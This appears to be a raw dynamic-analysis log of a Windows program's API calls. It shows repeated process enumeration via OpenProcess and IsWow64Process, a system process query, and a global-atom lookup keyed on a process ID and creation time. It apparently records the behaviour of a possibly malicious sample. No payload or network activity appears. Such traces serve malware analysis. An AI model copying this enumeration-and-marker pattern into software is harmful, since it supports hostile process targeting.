	[0108.959] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xfe4) returned 0x694
	[0108.959] IsWow64Process (in: hProcess=0x694, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0108.959] CloseHandle (hObject=0x694) returned 1
	[0108.960] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xc14) returned 0x694
	[0108.960] IsWow64Process (in: hProcess=0x694, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0108.960] CloseHandle (hObject=0x694) returned 1
	[0108.960] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xc1c) returned 0x694
	[0108.960] IsWow64Process (in: hProcess=0x694, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0108.960] CloseHandle (hObject=0x694) returned 1
	[0108.960] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x514) returned 0x694
	[0108.960] IsWow64Process (in: hProcess=0x694, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0108.960] CloseHandle (hObject=0x694) returned 1
	[0108.960] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xc28) returned 0x694
	[0108.960] IsWow64Process (in: hProcess=0x694, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0108.960] CloseHandle (hObject=0x694) returned 1
	[0108.961] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xc3c) returned 0x694
	[0108.961] IsWow64Process (in: hProcess=0x694, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0108.961] CloseHandle (hObject=0x694) returned 1
	[0108.961] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xc3c) returned 0x694
	[0108.961] GetModuleHandleA (lpModuleName="kernel32.dll") returned 0x765a0000
	[0108.962] GetProcAddress (hModule=0x765a0000, lpProcName="GetProcessTimes") returned 0x765c3dc0
	[0108.962] GetProcessTimes (in: hProcess=0x694, lpCreationTime=0x286fadc, lpExitTime=0x286fac4, lpKernelTime=0x286facc, lpUserTime=0x286fad4 | out: lpCreationTime=0x286fadc, lpExitTime=0x286fac4, lpKernelTime=0x286facc, lpUserTime=0x286fad4) returned 1
	[0108.962] wsprintfA (in: param_1=0x3993a10, param_2="%d-%08x-%08x" | out: param_1="3132-01d492ec-3643cc1f") returned 22
	[0108.963] GetModuleHandleA (lpModuleName="kernel32.dll") returned 0x765a0000
	[0108.963] GetProcAddress (hModule=0x765a0000, lpProcName="GlobalFindAtomA") returned 0x765bd0c0
	[0108.963] GetModuleHandleA (lpModuleName="kernel32.dll") returned 0x765a0000
	[0108.963] GetProcAddress (hModule=0x765a0000, lpProcName="FindAtomA") returned 0x765bef10
	[0108.963] FindAtomA (lpString="3132-01d492ec-3643cc1f") returned 0x0
	[0108.963] GlobalFindAtomA (lpString="3132-01d492ec-3643cc1f") returned 0xc18f
	[0108.963] CloseHandle (hObject=0x694) returned 1
	[0108.964] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xcf4) returned 0x0
	[0108.964] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x30c) returned 0x694
	[0108.964] IsWow64Process (in: hProcess=0x694, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0108.964] CloseHandle (hObject=0x694) returned 1
	[0108.964] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xdd4) returned 0x694
	[0108.964] IsWow64Process (in: hProcess=0x694, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0108.964] CloseHandle (hObject=0x694) returned 1
	[0108.964] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xd50) returned 0x694
	[0108.964] IsWow64Process (in: hProcess=0x694, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0108.964] CloseHandle (hObject=0x694) returned 1
	[0109.168] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xfc) returned 0x0
	[0109.168] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x144) returned 0x0
	[0109.168] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x18c) returned 0x0
	[0109.168] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x198) returned 0x0
	[0109.168] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x1cc) returned 0x0
	[0109.168] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x1f0) returned 0x0
	[0109.168] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x1f8) returned 0x0
	[0109.169] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x248) returned 0x0
	[0109.169] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x268) returned 0x0
	[0109.169] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x2cc) returned 0x0
	[0109.169] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x324) returned 0x0
	[0109.169] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x34c) returned 0x0
	[0109.169] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x35c) returned 0x0
	[0109.170] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x3a0) returned 0x0
	[0109.170] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x3c0) returned 0x0
	[0109.170] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x3d4) returned 0x0
	[0109.170] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xe4) returned 0x0
	[0109.170] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x460) returned 0x0
	[0109.170] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x50c) returned 0x694
	[0109.170] IsWow64Process (in: hProcess=0x694, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0109.170] CloseHandle (hObject=0x694) returned 1
	[0109.170] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x600) returned 0x0
	[0109.171] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x650) returned 0x0
	[0109.171] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x6e4) returned 0x694
	[0109.171] IsWow64Process (in: hProcess=0x694, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0109.171] CloseHandle (hObject=0x694) returned 1
	[0109.171] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x6d4) returned 0x0
	[0109.171] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x700) returned 0x694
	[0109.171] IsWow64Process (in: hProcess=0x694, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0109.171] CloseHandle (hObject=0x694) returned 1
	[0109.171] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x84c) returned 0x694
	[0109.172] IsWow64Process (in: hProcess=0x694, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0109.172] CloseHandle (hObject=0x694) returned 1
	[0109.172] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x894) returned 0x694
	[0109.172] IsWow64Process (in: hProcess=0x694, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0109.172] CloseHandle (hObject=0x694) returned 1
	[0109.172] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x9cc) returned 0x694
	[0109.172] IsWow64Process (in: hProcess=0x694, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0109.172] CloseHandle (hObject=0x694) returned 1
	[0109.172] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xa38) returned 0x694
	[0109.172] IsWow64Process (in: hProcess=0x694, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0109.172] CloseHandle (hObject=0x694) returned 1
	[0109.172] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xae0) returned 0x694
	[0109.172] IsWow64Process (in: hProcess=0x694, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0109.172] CloseHandle (hObject=0x694) returned 1
	[0109.173] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x924) returned 0x0
	[0109.173] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x310) returned 0x694
	[0109.173] IsWow64Process (in: hProcess=0x694, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0109.173] CloseHandle (hObject=0x694) returned 1
	[0109.173] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xc50) returned 0x694
	[0109.173] IsWow64Process (in: hProcess=0x694, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0109.173] CloseHandle (hObject=0x694) returned 1
	[0109.173] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xd80) returned 0x694
	[0109.173] IsWow64Process (in: hProcess=0x694, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0109.173] CloseHandle (hObject=0x694) returned 1
	[0109.173] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xe90) returned 0x694
	[0109.173] IsWow64Process (in: hProcess=0x694, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0109.173] CloseHandle (hObject=0x694) returned 1
	[0109.174] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xea4) returned 0x694
	[0109.174] IsWow64Process (in: hProcess=0x694, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0109.174] CloseHandle (hObject=0x694) returned 1
	[0109.174] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xeb8) returned 0x694
	[0109.174] IsWow64Process (in: hProcess=0x694, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0109.174] CloseHandle (hObject=0x694) returned 1
	[0109.174] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xecc) returned 0x694
	[0109.174] IsWow64Process (in: hProcess=0x694, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0109.174] CloseHandle (hObject=0x694) returned 1
	[0109.174] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xee0) returned 0x694
	[0109.174] IsWow64Process (in: hProcess=0x694, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0109.174] CloseHandle (hObject=0x694) returned 1
	[0109.174] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xef4) returned 0x694
	[0109.174] IsWow64Process (in: hProcess=0x694, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0109.174] CloseHandle (hObject=0x694) returned 1
	[0109.175] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xf08) returned 0x694
	[0109.175] IsWow64Process (in: hProcess=0x694, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0109.175] CloseHandle (hObject=0x694) returned 1
	[0109.175] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xf24) returned 0x694
	[0109.175] IsWow64Process (in: hProcess=0x694, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0109.175] CloseHandle (hObject=0x694) returned 1
	[0109.175] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xf44) returned 0x694
	[0109.175] IsWow64Process (in: hProcess=0x694, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0109.175] CloseHandle (hObject=0x694) returned 1
	[0109.175] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xf60) returned 0x694
	[0109.175] IsWow64Process (in: hProcess=0x694, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0109.175] CloseHandle (hObject=0x694) returned 1
	[0109.175] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xf78) returned 0x694
	[0109.176] IsWow64Process (in: hProcess=0x694, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0109.176] CloseHandle (hObject=0x694) returned 1
	[0109.176] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xf8c) returned 0x694
	[0109.176] IsWow64Process (in: hProcess=0x694, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0109.176] CloseHandle (hObject=0x694) returned 1
	[0109.176] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xfac) returned 0x694
	[0109.176] IsWow64Process (in: hProcess=0x694, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0109.176] CloseHandle (hObject=0x694) returned 1
	[0109.176] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xfc0) returned 0x694
	[0109.176] IsWow64Process (in: hProcess=0x694, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0109.176] CloseHandle (hObject=0x694) returned 1
	[0109.176] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xfe4) returned 0x694
	[0109.176] IsWow64Process (in: hProcess=0x694, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0109.176] CloseHandle (hObject=0x694) returned 1
	[0109.176] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xc14) returned 0x694
	[0109.176] IsWow64Process (in: hProcess=0x694, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0109.177] CloseHandle (hObject=0x694) returned 1
	[0109.177] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xc1c) returned 0x694
	[0109.177] IsWow64Process (in: hProcess=0x694, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0109.177] CloseHandle (hObject=0x694) returned 1
	[0109.177] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x514) returned 0x694
	[0109.177] IsWow64Process (in: hProcess=0x694, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0109.177] CloseHandle (hObject=0x694) returned 1
	[0109.177] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xc28) returned 0x694
	[0109.177] IsWow64Process (in: hProcess=0x694, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0109.177] CloseHandle (hObject=0x694) returned 1
	[0109.178] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xc3c) returned 0x694
	[0109.178] IsWow64Process (in: hProcess=0x694, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0109.178] CloseHandle (hObject=0x694) returned 1
	[0109.178] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xc3c) returned 0x694
	[0109.178] GetModuleHandleA (lpModuleName="kernel32.dll") returned 0x765a0000
	[0109.178] GetProcAddress (hModule=0x765a0000, lpProcName="GetProcessTimes") returned 0x765c3dc0
	[0109.178] GetProcessTimes (in: hProcess=0x694, lpCreationTime=0x286fadc, lpExitTime=0x286fac4, lpKernelTime=0x286facc, lpUserTime=0x286fad4 | out: lpCreationTime=0x286fadc, lpExitTime=0x286fac4, lpKernelTime=0x286facc, lpUserTime=0x286fad4) returned 1
	[0109.178] wsprintfA (in: param_1=0x39937e0, param_2="%d-%08x-%08x" | out: param_1="3132-01d492ec-3643cc1f") returned 22
	[0109.179] GetModuleHandleA (lpModuleName="kernel32.dll") returned 0x765a0000
	[0109.179] GetProcAddress (hModule=0x765a0000, lpProcName="GlobalFindAtomA") returned 0x765bd0c0
	[0109.179] GetModuleHandleA (lpModuleName="kernel32.dll") returned 0x765a0000
	[0109.179] GetProcAddress (hModule=0x765a0000, lpProcName="FindAtomA") returned 0x765bef10
	[0109.179] FindAtomA (lpString="3132-01d492ec-3643cc1f") returned 0x0
	[0109.179] GlobalFindAtomA (lpString="3132-01d492ec-3643cc1f") returned 0xc18f
	[0109.247] CloseHandle (hObject=0x694) returned 1
	[0109.247] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xcf4) returned 0x0
	[0109.247] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x30c) returned 0x694
	[0109.247] IsWow64Process (in: hProcess=0x694, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0109.248] CloseHandle (hObject=0x694) returned 1
	[0109.248] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xdd4) returned 0x694
	[0109.248] IsWow64Process (in: hProcess=0x694, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0109.248] CloseHandle (hObject=0x694) returned 1
	[0109.248] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xd50) returned 0x694
	[0109.248] IsWow64Process (in: hProcess=0x694, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0109.248] CloseHandle (hObject=0x694) returned 1
	[0109.463] VirtualAlloc (lpAddress=0x0, dwSize=0x170e0, flAllocationType=0x3000, flProtect=0x4) returned 0x3c20000
	[0109.467] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3c20000, Length=0x170e0, ResultLength=0x0 | out: SystemInformation=0x3c20000, ResultLength=0x0) returned 0x0
	[0109.470] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xfc) returned 0x0
	[0109.470] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x144) returned 0x0
	[0109.470] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x18c) returned 0x0
	[0109.471] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x198) returned 0x0
	[0109.471] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x1cc) returned 0x0
	[0109.471] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x1f0) returned 0x0
	[0109.471] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x1f8) returned 0x0
	[0109.471] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x248) returned 0x0
	[0109.471] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x268) returned 0x0
	[0109.472] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x2cc) returned 0x0
	[0109.472] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x324) returned 0x0
	[0109.472] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x34c) returned 0x0
	[0109.472] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x35c) returned 0x0
	[0109.472] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x3a0) returned 0x0
	[0109.472] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x3c0) returned 0x0
	[0109.472] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x3d4) returned 0x0
	[0109.473] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xe4) returned 0x0
	[0109.473] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x460) returned 0x0
	[0109.473] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x50c) returned 0x694
	[0109.474] IsWow64Process (in: hProcess=0x694, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0109.474] CloseHandle (hObject=0x694) returned 1
	[0109.474] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x600) returned 0x0
	[0109.474] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x650) returned 0x0
	[0109.474] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x6e4) returned 0x694
	[0109.475] IsWow64Process (in: hProcess=0x694, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0109.475] CloseHandle (hObject=0x694) returned 1
	[0109.475] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x6d4) returned 0x0
	[0109.475] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x700) returned 0x694
	[0109.475] IsWow64Process (in: hProcess=0x694, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0109.475] CloseHandle (hObject=0x694) returned 1
	[0109.475] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x84c) returned 0x694
	[0109.475] IsWow64Process (in: hProcess=0x694, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0109.475] CloseHandle (hObject=0x694) returned 1
	[0109.475] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x894) returned 0x694
	[0109.475] IsWow64Process (in: hProcess=0x694, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0109.475] CloseHandle (hObject=0x694) returned 1
	[0109.475] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x9cc) returned 0x694
	[0109.475] IsWow64Process (in: hProcess=0x694, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0109.476] CloseHandle (hObject=0x694) returned 1
	[0109.476] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xa38) returned 0x694
	[0109.476] IsWow64Process (in: hProcess=0x694, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0109.476] CloseHandle (hObject=0x694) returned 1
	[0109.476] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xae0) returned 0x694
	[0109.476] IsWow64Process (in: hProcess=0x694, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0109.476] CloseHandle (hObject=0x694) returned 1
	[0109.477] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x924) returned 0x0
	[0109.478] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x310) returned 0x694
	[0109.478] IsWow64Process (in: hProcess=0x694, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0109.478] CloseHandle (hObject=0x694) returned 1
	[0109.478] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xc50) returned 0x694
	[0109.478] IsWow64Process (in: hProcess=0x694, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0109.478] CloseHandle (hObject=0x694) returned 1
	[0109.478] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xd80) returned 0x694
	[0109.478] IsWow64Process (in: hProcess=0x694, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0109.478] CloseHandle (hObject=0x694) returned 1
	[0109.478] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xe90) returned 0x694
	[0109.478] IsWow64Process (in: hProcess=0x694, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0109.478] CloseHandle (hObject=0x694) returned 1
	[0109.478] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xea4) returned 0x694
	[0109.481] IsWow64Process (in: hProcess=0x694, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0109.482] CloseHandle (hObject=0x694) returned 1
	[0109.482] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xeb8) returned 0x694
	[0109.482] IsWow64Process (in: hProcess=0x694, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0109.482] CloseHandle (hObject=0x694) returned 1
	[0109.482] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xecc) returned 0x694
	[0109.482] IsWow64Process (in: hProcess=0x694, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0109.482] CloseHandle (hObject=0x694) returned 1
	[0109.482] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xee0) returned 0x694
	[0109.482] IsWow64Process (in: hProcess=0x694, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0109.482] CloseHandle (hObject=0x694) returned 1
	[0109.482] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xef4) returned 0x694
	[0109.482] IsWow64Process (in: hProcess=0x694, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0109.482] CloseHandle (hObject=0x694) returned 1
	[0109.483] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xf08) returned 0x694
	[0109.483] IsWow64Process (in: hProcess=0x694, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0109.483] CloseHandle (hObject=0x694) returned 1
	[0109.483] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xf24) returned 0x694
	[0109.483] IsWow64Process (in: hProcess=0x694, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0109.483] CloseHandle (hObject=0x694) returned 1
	[0109.484] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xf44) returned 0x694
	[0109.484] IsWow64Process (in: hProcess=0x694, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0109.484] CloseHandle (hObject=0x694) returned 1
	[0109.484] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xf60) returned 0x694
	[0109.485] IsWow64Process (in: hProcess=0x694, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0109.485] CloseHandle (hObject=0x694) returned 1
	[0109.485] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xf78) returned 0x694
	[0109.485] IsWow64Process (in: hProcess=0x694, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0109.485] CloseHandle (hObject=0x694) returned 1
	[0109.485] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xf8c) returned 0x694
	[0109.485] IsWow64Process (in: hProcess=0x694, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0109.485] CloseHandle (hObject=0x694) returned 1
	[0109.485] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xfac) returned 0x694
	[0109.485] IsWow64Process (in: hProcess=0x694, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0109.485] CloseHandle (hObject=0x694) returned 1
	[0109.485] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xfc0) returned 0x694
	[0109.485] IsWow64Process (in: hProcess=0x694, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0109.485] CloseHandle (hObject=0x694) returned 1
	[0109.486] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xfe4) returned 0x694
	[0109.486] IsWow64Process (in: hProcess=0x694, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0109.486] CloseHandle (hObject=0x694) returned 1
	[0109.486] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xc14) returned 0x694
	[0109.486] IsWow64Process (in: hProcess=0x694, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0109.486] CloseHandle (hObject=0x694) returned 1
	[0109.486] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xc1c) returned 0x694
	[0109.486] IsWow64Process (in: hProcess=0x694, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0109.486] CloseHandle (hObject=0x694) returned 1
	[0109.486] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x514) returned 0x694
	[0109.486] IsWow64Process (in: hProcess=0x694, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0109.486] CloseHandle (hObject=0x694) returned 1
	[0109.486] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xc28) returned 0x694
	[0109.486] IsWow64Process (in: hProcess=0x694, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0109.486] CloseHandle (hObject=0x694) returned 1
	[0109.487] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xc3c) returned 0x694
	[0109.487] IsWow64Process (in: hProcess=0x694, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0109.487] CloseHandle (hObject=0x694) returned 1
